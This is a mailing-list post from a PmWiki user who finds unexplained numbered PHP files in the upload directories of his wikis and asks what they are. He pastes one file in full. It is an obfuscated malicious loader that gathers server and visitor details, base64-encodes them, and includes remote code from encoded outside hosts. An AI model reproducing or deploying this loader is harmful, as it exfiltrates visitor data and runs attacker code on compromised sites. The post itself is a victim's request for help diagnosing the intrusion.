[pmwiki-users] Mysterious php file appears in upload directory

Dr Fred C drfredc at verizon.net
Sat Apr 28 11:34:32 CDT 2007


I went to upload a file to one of my wikis this morning and, while that 
went fine, I noticed a curious 43248.php file that had been uploaded to 
this upload directory, last night around 2:30 am.   I checked with my 
FTP program and quite a number of my various wikis had a similar php 
file in the uploads directorys, and in the wiki.d directory -- always 
with a different # for the file name, always of the same size.

I downloaded it and it contained this info.

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? 
$_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? 
$_SERVER["SERVER_NAME"] : 
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? 
$_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) 
? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) 
? $_SERVER["QUERY_STRING"] : 
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? 
$_SERVER["HTTP_REFERER"] : 
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? 
$_SERVER["HTTP_USER_AGENT"] : 
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? 
$_SERVER["REMOTE_ADDR"] : 
$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? 
$_SERVER["SCRIPT_FILENAME"] : 
$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? 
$_SERVER["HTTP_ACCEPT_LANGUAGE"] : 
$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); 
if 
((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} 
else 
{include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} 
?>

--------
Any ideas on what is going on here?  

-- 

Always, Dr Fred C
drfredc at drfredc.com




More information about the pmwiki-users mailing list